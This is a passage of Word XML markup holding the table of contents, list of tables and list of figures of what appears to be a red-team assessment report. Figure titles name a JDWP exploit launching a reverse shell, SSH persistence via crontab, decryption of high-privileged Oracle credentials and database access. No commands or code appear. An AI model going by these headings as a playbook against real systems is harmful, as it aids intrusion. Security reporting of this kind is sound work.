              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62CE8438" w14:textId="5F977443" w:rsidR="0047154C" w:rsidRPr="001019D3" w:rsidRDefault="00F27A8E" w:rsidP="0047154C">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc213253590" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.2.9.</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IE"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Server serving unencrypted Oracle Internet Directory (OID)</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253590 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="0047154C" w:rsidRPr="001019D3">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="52370EF9" w14:textId="77777777" w:rsidR="0047154C" w:rsidRPr="001019D3" w:rsidRDefault="0047154C" w:rsidP="0047154C">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>List of tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06405CB3" w14:textId="63348DBC" w:rsidR="00583A7F" w:rsidRPr="001019D3" w:rsidRDefault="00A1621A">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r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Table" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc213253591" w:history="1">
        <w:r w:rsidR="00583A7F" w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Table 1: Cyber Kill Chain mapping to the MITRE ATT&amp;CK matrix.</w:t>
        </w:r>
        <w:r w:rsidR="00583A7F" w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00583A7F" w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00583A7F" w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253591 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00583A7F" w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00583A7F" w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="00583A7F" w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E30FFFD" w14:textId="74586674"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2" w:history="1">
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Table 2: Threat and skill levels.</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253592 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68D97941" w14:textId="2A15E361"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3" w:history="1">
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Table 3: Success scale of goals and objectives.</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253593 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A0DA5A0" w14:textId="12282939"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4" w:history="1">
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Table 4: Ratings used for findings.</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253594 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7897E45B" w14:textId="169061FA"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5" w:history="1">
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Table 5: MITRE ATT&amp;CK matrix colour meaning.</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253595 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7620735D" w14:textId="1B672D37"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6" w:history="1">
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Table 6: Goals and objectives.</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253596 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55F69DD0" w14:textId="54EE4BCF"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7" w:history="1">
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Table 7: List of issued White Cards.</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253597 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7111051C" w14:textId="0D7C43B9" w:rsidR="00583A7F" w:rsidRPr="001019D3" w:rsidRDefault="00583A7F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IE"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc213253598" w:history="1">
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Table 8: List of deconflictions.</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253598 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r w:rsidRPr="001019D3">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0E29DBCA" w14:textId="34FDE721" w:rsidR="00A1621A" w:rsidRPr="001019D3" w:rsidRDefault="00A1621A" w:rsidP="00A1621A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>List of figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296FFC99" w14:textId="4BA08E54" w:rsidR="001019D3" w:rsidRDefault="004A6BBF">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r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figure" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc213253786" w:history="1">
        <w:r w:rsidR="001019D3" w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1: Cyber Kill Chain Diagram.</w:t>
        </w:r>
        <w:r w:rsidR="001019D3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001019D3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001019D3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253786 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001019D3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001019D3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="001019D3">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="483A37CF" w14:textId="186D053F"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87" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2: Adversary emulation plan.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253787 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C7BE78F" w14:textId="23A1E19C"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88" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3: Attack path.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253788 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="386F5BED" w14:textId="326741EC"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89" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4: Phishing exercise summary.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253789 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23265A0F" w14:textId="6CF1CA56"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0" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 5: Exploit of JDWP launching a reverse shell.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253790 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1159A574" w14:textId="0ACF9395"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1" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 6: crontab before adding SSH persistence script.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253791 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="372D08DD" w14:textId="1315A5BC"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2" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 7: crontab after adding the SSH persistence script.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253792 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>28</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55B9E931" w14:textId="1C8566C0"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3" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 8: High-privileged Oracle credentials decrypted using wlst.sh.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253793 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5833CDA6" w14:textId="1DD99A37"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4" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 9: Access to EUTL PUBLIC database in acceptance.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc213253794 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00706DA2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="566532C5" w14:textId="0E757E5B"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5" w:history="1">
        <w:r w:rsidRPr="00D63070">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
